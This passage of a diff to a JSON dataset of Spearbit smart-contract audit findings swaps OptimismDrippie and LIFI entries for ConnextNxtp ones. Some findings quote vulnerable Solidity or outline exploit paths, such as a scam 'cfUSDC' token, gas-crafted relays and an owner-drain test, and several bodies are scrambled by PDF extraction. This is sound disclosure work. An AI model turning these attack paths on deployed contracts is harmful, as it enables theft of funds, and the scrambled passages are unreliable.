Inside executable an external contract is called by this instruction require( state.config.dripcheck.check(state.config.checkparams), \"Drippie: dripcheck failed so drip is not yet ready to be triggered\" ); Optimism provided some examples like checking if a target balance is below a specific threshold or above that threshold, but in general, the dripcheck.check invocation could perform any kind of checks. The important part that should be clear in the natspec documentation of the drip function is that that specific check is performed only once before the execution of the bulk of actions.", + "title": "Use delete", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The functions _setOwner() and removeRouter() clear values by setting them to 0. Other parts of the code use delete. So using delete here too would be more consistent. ProposedOwnable.sol function _setOwner(address newOwner) internal { ... _proposedOwnershipTimestamp = 0; _proposed = address(0); ... } RoutersFacet.sol function removeRouter(address router) external onlyOwnerOrRouter { ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Considerations on the drip state.last and state.config.interval values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "When the drip function is called by an external actor, the executable is executed to check if the drip meets all the needed requirements to be executed. The only check that is done regarding the drip state.last and state.config.interval is this require( state.last + state.config.interval <= block.timestamp, \"Drippie: drip interval has not elapsed since last drip\" ); The state.time is never really initialized when the create function is called, this means that it will be automatically initialized with the default value of the uint256 type: 0. Consideration 1: Drips could be executed as soon as created Depending on the value set to state.config.interval the executables logic implies that as soon as a drip is created, the drip can be immediately (even in the same transaction) executed via the drip function. Consideration 2: A very high value for interval could make the drip never executable block.timestamp represents the number of seconds that passed since Unix Time (1970-01-01T00:00:00Z). When the owner of the Drippie want to create a \"one shot\" drip that can be executed immediately after creation but only once (even if the owner forgets to set the drips status to ARCHIVED) he/she should be aware that the max value that he/she can use for the interval is at max block.timestamp. This mean that the second time the drip can be executed is after block.timestamp seconds have been passed. If, for example, the owner create right now a drip with interval = block.timestamp it means that after the first execution the same drip could be executed after ~52 years (~2022-1970).", + "title": "replace usages of abi.encodeWithSignature and abi.encodeWithSelector with abi.encodeCall to ensure typo and type safety", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": " When abi.encodeWithSignature is used the compiler does not check for mistakes in the signature or the types provided. 
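For illustration, a minimal sketch of the type-safe abi.encodeCall alternative (IERC20.transfer is an arbitrary example; abi.encodeCall is available from Solidity 0.8.11):

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract EncodeCallSketch {
    // The compiler checks the arguments against IERC20.transfer's declared
    // parameter types, so a typo in the signature or a wrong argument type
    // fails at compile time instead of producing a bad calldata payload.
    function encodeTransfer(address to, uint256 amount) external pure returns (bytes memory) {
        return abi.encodeCall(IERC20.transfer, (to, amount));
    }
}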
When abi.encodeWithSelector is used the compiler does not check for parameter type inconsistencies.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Support ERC1155 in AssetReceiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver support ERC20 and ERC721 interfaces but not ERC1155.", + "title": "setAggregators is missing checks against address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setAggregators does not check if tokenAddresses[i] or sources[i] is address(0).", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Reorder DripStatus Enum for Clarity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The current implementation of Drippie contract has the following enum type: enum DripStatus { NONE, // uint8(0) ACTIVE, PAUSED, ARCHIVED } When a drip is created via the create function, its status is initialized to PAUSED (equal to uint8(2)) and when it gets activated its status is changed to ACTIVE (equal to uint8(1)) So, the status change from 0 (NONE) to 2 (PAUSED) to 1 (ACTIVE). Switching the order inside the enum DripStatus definition between PAUSED and ACTIVE would make it more clean and easier to understand.", + "title": "setAggregators can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setAggregators does not check if tokenAddresses.length is equal to sources.length in order to revert early.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "_gas is Unneeded as Transactor.CALL and Transactor.DELEGATECALL Function Argument", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The caller (i.e. contract owner) can control desired amount of gas at the transaction level.", + "title": "Event is not emitted when an important action happens on-chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "No event is emitted when an important action happens on-chain.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Licensing Conflict on Inherited Dependencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Solmate contracts are AGPL Licensed which is incompatible with the MIT License of Drippie related contracts.", + "title": "Add unit/fuzz tests to make sure edge cases would not cause an issue in Queue._length", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It is always assumed last + 1 >= first. It would be great to add unit/fuzz tests to check for this invariant.
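A minimal Foundry-style sketch of such a fuzz test follows; the _length mirror below assumes the arithmetic is last + 1 - first, and a real test should call into the actual Queue library instead:

import {Test} from "forge-std/Test.sol";

contract QueueLengthFuzzSketch is Test {
    // Assumed mirror of Queue._length's arithmetic; replace with an import
    // of the real library in an actual test.
    function _length(uint128 first, uint128 last) internal pure returns (uint256) {
        return uint256(last) + 1 - uint256(first);
    }

    // Fuzz the documented invariant last + 1 >= first; inputs that violate it
    // are discarded, so the subtraction above can never underflow.
    function testFuzz_LengthMatchesInvariant(uint128 first, uint128 last) public {
        vm.assume(uint256(last) + 1 >= uint256(first));
        assertLe(_length(first, last), uint256(type(uint128).max) + 1);
    }
}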
Adding these tests", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Rename Functions for Clarity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "status The status(string memory _name, DripStatus _status) function allows the owner to update the status of a drip. The purpose of the function, based on the name, is not obvious at first sight and could confuse a user into believing that its a view function to retrieve the status of a drip instead of mutating its status. executable The executable(string memory _name) public view returns (bool) function returns true if the drip with name _name can be executed.", + "title": "Consider using prefix(...) instead of slice(0,...)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "tokenId() calls TypedMemView.slice() function to slice the first few bytes from _message: return _message.slice(0, TOKEN_ID_LEN, uint40(Types.TokenId)); TypedMemView.prefix() can also be used here since it achieves the same goal.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Owner Has Permission to Drain Value from Drippie Contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarios. Scenario 1 Owner may create arbitrary drips, including a drip to send all funds to themselves. Scenario 2 AssetReceiver permits owner to withdraw ETH, ERC20 tokens, and ERC721 tokens. Scenario 3 Owner may execute arbitrary calls. Transactor.CALL function is a function that allows the owner of the contract to execute a \"general purpose\" low- level call. function CALL( address _target, bytes memory _data, uint256 _gas, uint256 _value ) external payable onlyOwner returns (bool, bytes memory) { return _target.call{ gas: _gas, value: _value }(_data); } The function will transfer _value ETH present in the contract balance to the _target address. The function is also payable and this mean that the owner can send along with the call some funds. Test example showcasing the issue: 23 function test_transactorCALLAllowOwnerToDrainDrippieContract() public { bool success; vm.deal(deployer, 0 ether); vm.deal(bob, 0 ether); vm.deal(address(drippie), 1 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them (success, ) = drippie.CALL{value: 0 ether}(bob, \"\", 100000, 1 ether); assertEq(success, true); assertEq(address(drippie).balance, 0 ether); assertEq(bob.balance, 1 ether); }", + "title": "Elaborate TypedMemView encoding in comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView describes its encoding in comments as: // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The comments can be elaborated to make them less ambiguous.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Receiver doesn't always reset allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _swapAndCompleteBridgeTokens() of Receiver reset the approval to the executor at the end of an ERC20 transfer. 
However it there is insufficient gas then the approval is not reset. This allows the executor to access any tokens (of the same type) left in the Receiver. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { ... } else { // case 2: ERC20 asset ... token.safeIncreaseAllowance(address(executor), amount); if (reserveRecoverGas && gasleft() < _recoverGas) { token.safeTransfer(receiver, amount); ... return; // no safeApprove 0 } try executor.swapAndCompleteBridgeTokens{...} ... token.safeApprove(address(executor), 0); } }", + "title": "Remove Curve StableSwap paper URL", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The link to the Curve StableSwap paper referenced in comments is no longer active: www.curve.fi/stableswap-paper.pdf. The current working URL is curve.fi/files/stableswap-paper.pdf.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "CelerIMFacet incorrectly sets RelayerCelerIM as receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "When assigning a bytes memory variable to a new variable, the new variable points to the same memory location. Changing any one variable updates the other variable. Here is a PoC as a foundry test function testCopy() public { Pp memory x = Pp({ a: 2, b: address(2) }); Pp memory y = x; y.b = address(1); assertEq(x.b, y.b); } Thus, when CelerIMFacet._startBridge() updates bridgeDataAdjusted.receiver, _bridgeData.receiver is implicitly updated too. This makes the receiver on the destination chain to be the relayer address. // case 'yes': bridge + dest call - send to relayer ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData; bridgeDataAdjusted.receiver = address(relayer); (bytes32 transferId, address bridgeAddress) = relayer .sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData); // call message bus via relayer incl messageBusFee relayer.forwardSendMessageWithTransfer{value: _celerIMData.messageBusFee}( _bridgeData.receiver, uint64(_bridgeData.destinationChainId), bridgeAddress, transferId, _celerIMData.callData );", + "title": "Missing Validations in AmplificationUtils.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "1. If initialAPrecise=futureAPrecise then there will not be any ramping. 2. In stopRampA function, self.futureATime > block.timestamp can be revised to self.futureATime >= block.timestamp since once the current timestamp has reached futureATime, futureAPrice will always be returned.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Max approval to any address is possible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "HopFacetOptimized.setApprovalForBridges() can be called by anyone to give max approval to any address for any ERC20 token. Any ERC20 token left in the Diamond can be stolen. function setApprovalForBridges(address[] calldata bridges,address[] calldata tokensToApprove) external { ... LibAsset.maxApproveERC20(..., type(uint256).max); ...
}", + "title": "Incorrect PriceSource is returned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Price Source is returned incorrectly in case of stale prices as shown below 1. getTokenPrice function is called with _tokenAddress T1. 2. Assume the direct price is stale, so tokenPrice is set to 0. uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } 3. Now contract tries to retrieve price from oracle. In case the price is outdated, the returned price will again be 0 and source would be set to PriceSource.CHAINLINK. if (tokenPrice == 0) { tokenPrice = getPriceFromOracle(tokenAddress); source = PriceSource.CHAINLINK; } 128 4. Assuming v1PriceOracle is not yet set, contract will simply return the price and source which in this case is 0, PriceSource.CHAINLINK. In this case amount is correct but source is not correct. return (tokenPrice, uint256(source));", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Return value of low-level .call() not checked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Low-level primitive .call() doesn't revert in caller's context when the callee reverts. value is not checked, it can lead the caller to falsely believe that the call was successful. Receiver.sol uses .call() to transfer the native token to receiver. If receiver reverts, this can lead to locked ETH in Receiver contract.", + "title": "PriceSource.DEX is never used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The enum value DEX is never used in the contract and can be removed.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Limits in LIFuelFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The facet LIFuelFacet is meant for small amounts, however, it doesn't have any limits on the funds sent. This might result in funds getting stuck due to insufficient liquidity on the receiving side. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { serviceFeeCollector.collectNativeGasFees{...}(...); } else { LibAsset.maxApproveERC20(...); serviceFeeCollector.collectTokenGasFees(...); ... } }", + "title": "Incorrect comment about handleOutgoingAsset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comment is incorrect as this function does not transfer funds to msg.sender. /** * @notice Handles transferring funds from the Connext contract to msg.sender. * @param _asset - The address of the ERC20 token to transfer. * @param _to - The recipient address that will receive the funds. * @param _amount - The amount to withdraw from contract. 
*/ function handleOutgoingAsset( address _asset, address _to, uint256 _amount ) internal {", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "The optimal version _depositAndSwap() isn't always used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _depositAndSwap() of SwapperV2 has two versions. The second version keeps _- nativeReserve that is meant for fees. Several facets don't use this version although their bridge does require native fees. This could result in calls reverting due to insufficient native tokens left. function _depositAndSwap(...) ... // 4 parameter version /// @param _nativeReserve Amount of native token to prevent from being swept back to the caller function _depositAndSwap(..., uint256 _nativeReserve) ... // 5 parameter version", + "title": "SafeMath is not required for Solidity 0.8.x", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Solidity 0.8.x has a built-in mechanism for dealing with overflows and underflows, so there is no need to use the SafeMath library", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "setContractOwner() is insufficient to lock down the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function transferOwnershipToZeroAddress() is meant to make the Diamond immutable. It sets the contract owner to 0. However, the contract owner can still be changed if there happens to be a pendingOwner. In that case confirmOwnershipTransfer() can still change the contract owner. function transferOwnershipToZeroAddress() external { // transfer ownership to 0 address LibDiamond.setContractOwner(address(0)); } function setContractOwner(address _newOwner) internal { DiamondStorage storage ds = diamondStorage(); address previousOwner = ds.contractOwner; ds.contractOwner = _newOwner; emit OwnershipTransferred(previousOwner, _newOwner); } function confirmOwnershipTransfer() external { Storage storage s = getStorage(); address _pendingOwner = s.newOwner; if (msg.sender != _pendingOwner) revert NotPendingOwner(); emit OwnershipTransferred(LibDiamond.contractOwner(), _pendingOwner); LibDiamond.setContractOwner(_pendingOwner); s.newOwner = LibAsset.NULL_ADDRESS; }", + "title": "Use a deadline check modifier in ProposedOwnable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Any change in ownership through acceptProposedOwner() and renounceOwnership() has to go through a deadline check: // Ensure delay has elapsed if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__acceptProposedOwner_delayNotElapsed(); This check can be extracted out in a modifier for readability.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Receiver does not verify address from the originator chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Receiver contract is designed to receive the cross-chain call from libDiamond address on the destination chain. 
However, it does not verify the source chain address. An attacker can build a malicious _- callData. An attacker can steal funds if there are left tokens and there are allowances to the Executor. Note that the tokens may be lost in issue: \"Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract\". And there may be allowances to Executor in issue \"Receiver doesn't always reset allowance\"", + "title": "Use ExcessivelySafeCall in SpokeConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The low-level call code highlighted code above looks to be copied from ExcessivelySafeCall.sol. replacing this low-level call with the function call ExcessivelySafe- Consider", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Receiver contract is designed to gracefully return the funds to users. It reserves the gas for recovering gas before doing swaps via executor.swapAndCompleteBridgeTokens. The logic of reserving gas for recovering funds is implemented at Receiver.sol#L236-L258 contract Receiver is ILiFi, ReentrancyGuard, TransferrableOwnership { // ... if (reserveRecoverGas && gasleft() < _recoverGas) { // case 1a: not enough gas left to execute calls receiver.call{ value: amount }(\"\"); // ... } // case 1b: enough gas left to execute calls try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(\"\"); } // ... } 10 The gasleft() returns the remaining gas of a call. It is continuously decreasing. The second query of gasleft() is smaller than the first query. Hence, if the attacker tries to relay the transaction with a carefully crafted gas where gasleft() >= _recoverGas at the first quiry and gasleft() - _recoverGas reverts. This results in the token loss in the Receiver contract.", + "title": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use of name to identify a token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "startBridgeTokensViaCelerIM() uses the token name to identify cfUSDC token. Another token with the same name can pass this check. An attacker can create a scam token with the name \"cfUSDC\" and a function canonical() returning a legit ERC20 token address, say WETH. If this token is passed as _bridge- Data.sendingAssetId, CelerIMFacet will transfer WETH. 
11 if ( keccak256( abi.encodePacked( ERC20(_bridgeData.sendingAssetId).symbol() ) ) == keccak256(abi.encodePacked((\"cfUSDC\"))) ) { // special case for cfUSDC token asset = IERC20( CelerToken(_bridgeData.sendingAssetId).canonical() ); }", + "title": "The constant expression for EMPTY_HASH can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "EMPTY_HASH is a constant with a value equal to: hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\", which is the keccak256 of an empty bytes. We can replace this constant hex literal with a more readable alternative.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unvalidated destination address in Gravity faucet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Data.destinationAddress address. The code does not validate if the provided destination address is in the valid bech32 format. there is an issue related to the validation of In the Gravity faucet, This can potentially cause issues when sending tokens to the destination address. If the provided address is not in the bech32 format, the tokens can be locked. Also, it can lead to confusion for the end-users as they might enter an invalid address and lose their tokens without any warning or error message. it is recommended to add a validation check for the _gravity-", + "title": "Simplify and add more documentation for getTokenPrice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "getTokenPrice can be simplified and it can try to return early whenever possible.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Hardcode or whitelist the Thorswap vault address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The issue with this code is that the depositWithExpiry function allows the user to enter any arbitrary vault address, which could potentially lead to a loss of tokens. If a user enters an incorrect or non-existent vault address, the tokens could be lost forever. There should be some validation on the vault address to ensure that it is a valid and trusted address before allowing deposits to be made to it. Router 12 // Deposit an asset with a memo. ETH is forwarded, ERC-20 stays in ROUTER function deposit(address payable vault, address asset, uint amount, string memory memo) public payable nonReentrant{ ,! uint safeAmount; if(asset == address(0)){ safeAmount = msg.value; bool success = vault.send(safeAmount); require(success); } else { require(msg.value == 0, \"THORChain_Router: unexpected eth\"); // protect user from ,! 
accidentally locking up eth if(asset == RUNE) { safeAmount = amount; iRUNE(RUNE).transferTo(address(this), amount); iERC20(RUNE).burn(amount); } else { safeAmount = safeTransferFrom(asset, amount); // Transfer asset _vaultAllowance[vault][asset] += safeAmount; // Credit to chosen vault } } emit Deposit(vault, asset, safeAmount, memo); }", + "title": "Remove unused code, files, interfaces, libraries, contracts, ...", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The codebase includes code, files, interfaces, libraries, and contracts that are no longer in use.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Check enough native assets for fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of SquidFacet adds _squidData.fee to _bridgeData.minAmount. It has verified there is enough native asset for _bridgeData.minAmount, but not for _squidData.fee. So this could use native assets present in the Diamond, although there normally shouldn't be any native assets left. A similar issue occurs in: CelerIMFacet DeBridgeFacet function _startBridge(...) ... { ... uint256 msgValue = _squidData.fee; if (LibAsset.isNativeAsset(address(sendingAssetId))) { msgValue += _bridgeData.minAmount; } ... ... squidRouter.bridgeCall{ value: msgValue }(...); ... }", + "title": "_calculateSwapInv and _calculateSwap can mirror each other's calculations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "_calculateSwapInv could have mirrored the implementation of _calculateSwap: uint256 y = xp[tokenIndexTo] - (dy * multipliers[tokenIndexTo]); uint256 x = getY(_getAPrecise(self), tokenIndexTo, tokenIndexFrom, y, xp); Or, the other way around, _calculateSwap could mirror _calculateSwapInv; pick whichever is cheaper.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "No check on native assets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The functions startBridgeTokensViaHopL1Native(), startBridgeTokensViaXDaiBridge() and startBridgeTokensViaMultichain() don't check _bridgeData.minAmount <= msg.value. So this could use native assets that are still in the Diamond, although that normally shouldn't happen. This might be an issue in combination with reentrancy. function startBridgeTokensViaHopL1Native(...) ... { _hopData.hopBridge.sendToL2{ value: _bridgeData.minAmount }( ... ); ... } function startBridgeTokensViaXDaiBridge(...) ... { _startBridge(_bridgeData); } function startBridgeTokensViaMultichain(...) ...
{ if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) LibAsset.depositAsset(_bridgeData.sendingAssetId,_bridgeData.minAmount); } // no check for native assets _startBridge(_bridgeData, _multichainData); }", + "title": "Document that the virtual price of a stable swap pool might not be constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The virtual price of the LP token is not constant when the amplification coefficient is ramping, even when/if token balances stay the same.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Missing doesNotContainDestinationCalls()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The functions startBridgeTokensViaLIFuel() and swapAndStartBridgeTokensViaLIFuel() don't have doesNotContainDestinationCalls(). function startBridgeTokensViaLIFuel(...) external payable nonReentrant refundExcessNative(payable(msg.sender)) doesNotContainSourceSwaps(_bridgeData) validateBridgeData(_bridgeData) { ... }", + "title": "Document the reason for picking d as the starting point for calculating getYD using Newton's method.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "d is the stable swap invariant passed to getYD as a parameter, and it is used as the starting point of Newton's method to find a root. This root is the value/price for the tokenIndex token that would stabilize the pool so that it satisfies the stable swap invariant equation.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Race condition in _startBridge of LIFuelFacet.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "If the mapping for FEE_COLLECTOR_NAME hasn't been set up yet, then serviceFeeCollector will be address(0) in function _startBridge of LIFuelFacet. This might give unexpected results. function _startBridge(...) ... { ... ServiceFeeCollector serviceFeeCollector = ServiceFeeCollector( LibMappings.getPeripheryRegistryMappings().contracts[FEE_COLLECTOR_NAME] ); ... } function getPeripheryContract(string calldata _name) external view returns (address) { return LibMappings.getPeripheryRegistryMappings().contracts[_name]; }", + "title": "Document the max allowed tokens in stable swap pools used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Based on the uint8 type for the indexes of tokens in different stable swap pools, it is inferred that the max possible number of tokens that can exist in a pool is 256.
There is the following check when initializing internal pools: if (_pooledTokens.length <= 1 || _pooledTokens.length > 32) revert SwapAdminFacet__initializeSwap_invalidPooledTokens(); This means the internal pools can only have between 2 and 32 pooled tokens.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Sweep tokens from Hopfacets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Hop bridges HopFacet and HopFacetOptimized don't check that _bridgeData.sendingAssetId is the same as the bridge token. So this could be used to sweep tokens out of the Diamond contract. Normally there shouldn't be any tokens left in the Diamond; however, in this version there are small amounts left: Etherscan LiFiDiamond.", + "title": "Rename adoptedToLocalPools to better indicate what it represents", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "adoptedToLocalPools is used to keep track of external pools where one can swap between different variations of a token. But one might confuse this mapping as holding internal stable swap pools.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Missing emit in _swapAndCompleteBridgeTokens of Receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In function _swapAndCompleteBridgeTokens the catch of ERC20 tokens does an emit, while the comparable catch of native assets doesn't do an emit. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { .. try ... {} catch { receiver.call{ value: amount }(\"\"); // no emit } ... } else { // case 2: ERC20 asset ... try ... {} catch { token.safeTransfer(receiver, amount); emit LiFiTransferRecovered(...); } } }", + "title": "Document the usage of commented mysterious numbers in AppStorage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Before each of struct AppStorage's field definitions there is a line comment consisting of only digits (// xx). One would guess they might be relative slot indexes in storage (relative to AppStorage's slot), but the numbers are not consistent.", "labels": [ - "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "Spearbit", + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Spam events in 